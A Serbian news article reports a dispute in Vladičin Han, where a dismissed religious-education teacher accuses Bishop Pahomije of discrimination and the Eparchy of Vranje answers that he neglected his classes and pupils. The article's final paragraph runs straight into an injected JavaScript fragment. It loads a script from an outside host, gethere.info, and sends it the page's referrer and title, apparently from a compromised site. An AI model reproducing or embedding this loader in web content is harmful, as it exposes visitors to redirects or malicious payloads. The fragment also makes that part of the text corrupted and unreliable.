UZBUNJIVAČ: Žalba iz Vladičinog Hana

UZBUNJIVAČ: Žalba iz Vladičinog Hana


Nemanja Milosavljević, diplomirani teolog Pravoslavnog bogoslovskog fakultetu u Beogradu, optužio je vladiku Pahomija za diskriminaciju, tvrdeći da zbog njegove samovolje više ne radi kao veroučitelj u školama u Vladičinom Hanu. Vladika nije ostao bez odgovora

Vladičin Han, kaže predanje, ime je dobio po usamljenom hanu koji je polovinom 19. veka, bežeći od Turaka, podigao Grk Stefanos Stefanopulus, poznatiji kao Stefan Grk. Ovo, kasnije utočište karavana na carskom drumu Grk je potom prodao skopskom mitropolitu i vladici Pajsiju, po kom je han nazvan – Vladičin han, oko kog je kasnije niklo i istoimeno naselje.

A skoro dva veka kasnije, ove jeseni ponovo se u Hanu potegla priča o vladici, doduše ovom aktuelnom, episkopu vranjskom Pahomiju. Vladiku je Nemanja Milosavljević (32), diplomirani teolog Pravoslavnog bogoslovskog fakultetu u Beogradu i diplomirani inženjer arhitekture koji ovde živi sa porodicom, optužio za diskriminaciju, tvrdeći da zbog “samovolje vladike” više ne radi kao veroučitelj u hanskim školama.

Vladika nije ostao bez odgovora. Štaviše, tvrdi da je previše bio strpljiv sa “neodgovornim teologom”.

Sve je počelo 2011. godine, kada, po blagoslovu episkopa Pahomija, Milosavljević stupa na radno mesto veroučitelja u OŠ “Branko Radičević” i Gimnaziji “Jovan Skerlić” u Vladičinom Hanu.

– Na tom radnom mestu sa promenljivom radnom normom, odnosno fondom časova koji je dodeljivan po volji episkopa Pahomija, ostajem do septembra 2016. Pred sam početak školske 2016/17. godine uskraćen mi je, bez objašnjenja, dalji rad u ovoj školi i ponuđeno mi je rešenje kojim se raspoređujem u Gimnaziju “Jovan Skerlić” s fondom časova od 15 odsto, što će pretočeno u mesečnom prihodu iznositi 5.000-6.000 dinara. Odgovorio sam da ne mogu da preuzimam obavezu za takva skromna primanja, sada kada treba da zasnujem porodicu i čekam prinovu i da se nadam da će naći rešenje za moj problem angažovanjem u još nekoj školi. U međuvremenu, nisam dobio nikakav odgovor – priča Milosavljević za Ekspres.

To je bilo veliko poniženje za njega, tim pre što je, kaže, jedini diplomirani teolog u Vladičinom Hanu i jedan od retkih u Pčinjskom okrugu, a na teritoriji opštine postoje četiri osnovne i dve srednje škole.

– Samovoljom episkopa Pahomija za mene nikada nije bilo prostora da ostvarim punu radnu normu, a ove godine njegovom voljom ostao sam bez posla. Na radna mesta veroučitelja ovde se zapošljavaju ekonomisti, biolozi, učiteljice, hemičari, profesori odbrane i zaštite, studenti i sveštenici. Većina je završila kurs koji je organizovala Eparhija vranjska. Postavlja se pitanje da li kurs koji organizuje episkop Pahomije može biti ekvivalent diplomi Bogoslovskog fakulteta? Spisak veroučitelja koji episkop Pahomije dostavlja Ministarstvu prosvete sadrži niz netačnih podataka o zaposlenima, prvenstveno o njihovim zvanjima – tvrdi Milosavljević.

On navodi i da su neki sveštenici koje i lično poznaje predstavljeni kao apsolventi Bogoslovskog fakulteta, što, tvrdi, nije tačno. Posebno ističe da vladika Pahomije favorizuje sveštenike koji već imaju redovna primanja tako što ih šalje na rad u škole. Milosavljević, takođe, naglašava da roditelji, kao i direktori obeju škola i kolege, nisu imali nikakve primedbe na njegov rad, štaviše učenici Gimnazije “Jovan Skerlić” pisali su peticiju i otvorili Fejsbuk stranicu podrške. Vladika na to nije reagovao.

Pahomije teolog Nemanja MilosavljevićSamovoljom episkopa Pahomija za mene nikada nije bilo prostora da ostvarim punu radnu normu, a ove godine njegovom voljom ostao sam bez posla, kaže Nenad Milosavljević

Milosavljević smatra da je glavni problem to što se ne angažuje više u crkvi i lokalnoj zajednici.
– To je delimično tačno, ali ja nisam sveštenik. Vikendom, kada je liturgija, ja idem na planinarenje, ali predlagao sam da se više angažujem tamo gde mogu da predstavljam eparhiju i širim pravoslavne vrednosti. Vladika je, međutim, hteo pokornost i da “visim na čiviluku”, pre svega za poslove vezane za arhitekturu, izrade projekata, nadzor gradilišta u eparhiji, regulisanje pravih poslova za građevinu i arhitekturu i vezane za rad crkvene opštine u Hanu – proslave, praznici. Druge aktivnosti vezane na širenju duha pravoslavlja, poput tribina, organizovanja kampova za učenike u sklopu kojih smo obilazili i manastire, episkop je posmatrao sa podsmehom – tvrdi Milosavljević.

Vladika Pahomije negira sve optužbe Milosavljevića, uz tvrdnju da je dugo vremena imamo strpljenja za njegovu neodgovornost.

– Milosavljević nije imao dobar pristup deci, ponašao se neodgovorno, često nije držao časove, a onda je početkom školske godine dobio rešenje koje nije hteo da primi. Deca su prešla na građansko jer ne radi s njima. Dešavalo se da ne drži časove, ili da usred časa ostavi decu i ode. Otkako smo postavili drugog veroučitelja, deca su ponovo počela da pohađaju veronauku – kaže episkop Pahomije za Ekspres, i dodaje da je tri godine opominjao Milosavljevića da bude odgovorniji, ali da se on o to oglušio.

U isto vreme Eparhija vranjska poslala je redakciji Ekspresa dopis sa dokumentacijom i detaljnim objašnjenjem u slučaju doskorašnjeg veroučitelja.

“Sve što je Milosavljević rekao najobičnije su neistine i klevete pošto je njemu predavanje veronauke bilo potrebno da dobije platu, a o vršenju uloge veroučitelja i misije Crkve nije vodio računa”, navodi se u dopisu eparhije, koju je potpisao pomoćnik koordinatora za versku nastavu, protojerej Nebojša Stojadinov.

U više navrata školske 2014/15. i 2015/16. školske godine episkop Pahomije, piše u dopisu, zvao je Milosavljevića na razgovore, kojima je uvek prisustvovao i njegov otac Tihomir. Vladika ga je, navodi se, “očinski podsećao na njegove obaveze, savetovao da se malo više angažuje” kako se ne bi dogodilo da se u ovdašnjim školama ugasi veronauka.

U dopisu se pojašnjava i da je Milosavljević u školskoj 2015/16. godini bio angažovan 100 odsto, što se može videti iz dokumentacije.

“Što se tiče škola u kojima je Milosavljević bio angažovan kao katiheta i veroučitelj, primećujemo iz godine u godinu smanjenje fonda časova isključivo njegovom zaslugom, zbog nedolaska na časove i nedržanja časova zbog njegovih privatnih aktivnosti – planinarenja i čestog odsustvovanja u inostranstvu. Isto tako, nije obaveštavao kancelarije za versku nastavu o odsustvu, nije bio aktivan u školama za praznike, kao i za hramovnu i školsku slavu. Nije dovodio decu u crkvu na liturgiju, ni tokom 2014/15, niti tokom 2015/16. školske godine, a početkom školske 2015/16. godine u OŠ ‘Branko Radicević’ u prvom razredu nijedan učenik nije bio upisan na versku nastavu”, stoji u dopisu eparhije.

Milosavljević nije imao dobar pristup deci, ponašao se neodgovorno, često nije držao časove, a onda je početkom školske godine dobio rešenje koje nije hteo da primi, odgovara episkop Pahomije

Milosavljeviću je i ove školske godine rešenjem dodeljeno da predaje veronauku u Gimnaziji “Jovan Skerlić”, ali on to nije hteo da prihvati, navodi se dalje. Eparhija redom demantuje i navode da vladika Pahomije za veroučitelje favorizuje sveštenike koji već imaju redovna primanja, a sve kako bi rasteretio budžet Crkve, navodeći da nijedan sveštenik veroučitelj nije angažovan 100 odsto, već se procenat kreće u rasponu od 30 do 70 odsto.

Pahomije nemanja 3“Milosavljević, nažalost, kao diplomirani teolog nema predstavu o tome šta je Crkva. Umesto da sve svoje obaveze i aktivnosti podredi Crkvi, on Crkvu podređuje sebi. Kao veroučitelj i hrišćanin treba sve svoje obaveze i aktivnosti da sprovodi zajedno sa svojim učenicima u skladu s planom i programom, on, nažalost, čini suprotno, a to vidimo po tome što u toku školske 2015/16. godine nisu ni on ni njegovi učenici prisustvovali nijednoj liturgiji, a o pričešću i da ne govorimo. Ne brani njemu niko da se bavi planinarenjem i ostalim aktivnostima, ali neophodno je da kao veroučitelj izvrši svoje obaveze i dužnosti preuzete rešenjem”, zaključuju u Eparhiji vranjskoj.

Nemanja Milosavljević, čovek sa dva fakulteta, vratio se u Vladičin Han posle školovanja. To bi trebalo da bude na korist i njemu i zajednici i Crkvi. Sada je ostao bez posla, a nezaposlena je i njegova supruga. Čekaju bebu.

Svakako loša poruka običnom svetu u Hanu, koji se s pravom laički pita da li je vladika trebalo da ima malo više razumevanja, da pronađe “kvaku” talentovanom teologu i iz njega izvuče maksimum za Crkvu i zajednicu jer Nemanja se, osim planinarenja, bavi i spasilačkim radom, speleologijom, ikonopisanjem. S druge strane, pitanje je i zašto ovaj svestrani teolog nije pokazao malo više fleksibilnosti, pa i poslušnosti. Jer, zna dobro kako Crkva funkcioniše, školovao se za to.

OSTAVIO DECU SAMU ISPRED CRKVE

Eparhija vranjska u svom dopisu kaže da se dešavalo da Milosavljević “učenike OŠ ‘Branko Radičević’ povede do crkve, ali ih tu ispred crkve i ostavi, a on ode nekim svojim privatnim poslom i ne vrati se više”.

“Teren kod nove crkve Svetog kneza Lazara i kosovskih mučenika u Vladičinom Hanu veoma je nezgodan i deca u igri mogu da gurnu jedno drugo i da slete niz strminu, povrede se ili, ne daj Bože, bude sa težim i ozbiljnijim posledicama”, opisuje eparhija “grehe” dojučerašnjeg veroučitelja.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

1 comment

Dodajte komentar

+ Ostavite komentar